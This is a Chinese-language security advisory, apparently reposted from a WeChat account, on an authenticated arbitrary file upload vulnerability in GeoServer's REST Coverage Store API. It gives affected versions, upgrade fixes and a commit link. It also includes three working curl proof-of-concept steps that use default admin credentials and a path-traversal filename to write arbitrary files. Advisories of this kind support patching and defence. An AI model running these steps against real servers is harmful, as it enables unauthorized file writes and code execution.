漏洞描述:
GeoServer是一个用Java编写的开源软件服务器,允许用户共享和编辑地理空间数据,GeoServer受影响版本中存在任意文件上传漏洞,由于未验证用户输入的文件包装器资源路径是否包含"..",有登陆权限的攻击者可以通过构造恶意的REST Coverage Store API请求,上传任意文件以此执行任意代码。
Step 1 (create sample coverage store):
curl -vXPUT -H"Content-type:application/zip" -u"admin:geoserver" --data-binary @polyphemus.zip "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.imagemosaic"
Step 2 (switch store to absolute URL):
curl -vXPUT -H"Content-Type:application/xml" -u"admin:geoserver" -d"file:///{absolute path to data directory}/data/sf/filewrite" "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite"
Step 3 (upload arbitrary files):
curl -vH"Content-Type:" -u"admin:geoserver" --data-binary @file/to/upload "http://localhost:8080/geoserver/rest/workspaces/sf/coveragestores/filewrite/file.a?filename=../../../../../../../../../../file/to/write"
Steps 1 & 2 can be combined into a single POST REST call if local write access to anywhere on the the file system that GeoServer can read is possible (e.g., the /tmp directory).
影响范围:
org.geoserver:gs-restconfig(-∞, 2.23.4)
org.geoserver:gs-platform[2.24.0, 2.24.1)
org.geoserver:gs-restconfig[2.24.0, 2.24.1)
org.geoserver:gs-platform(-∞, 2.23.4)
修复方案:
将组件org.geoserver:gs-restconfig升级至 2.24.1 及以上版本
将org.geoserver:gs-platform升级至 2.23.4 及以上版本
将组件org.geoserver:gs-restconfig升级至 2.23.4 及以上版本
将组件org.geoserver:gs-platform升级至 2.24.1 及以上版本
参考链接:
https://github.com/geoserver/geoserver/commit/fe235b3bb1d7f05751a4a2ef5390c36f5c9e78ae
原文始发于微信公众号(飓风网络安全):【漏洞预警】GeoServer 文件上传漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论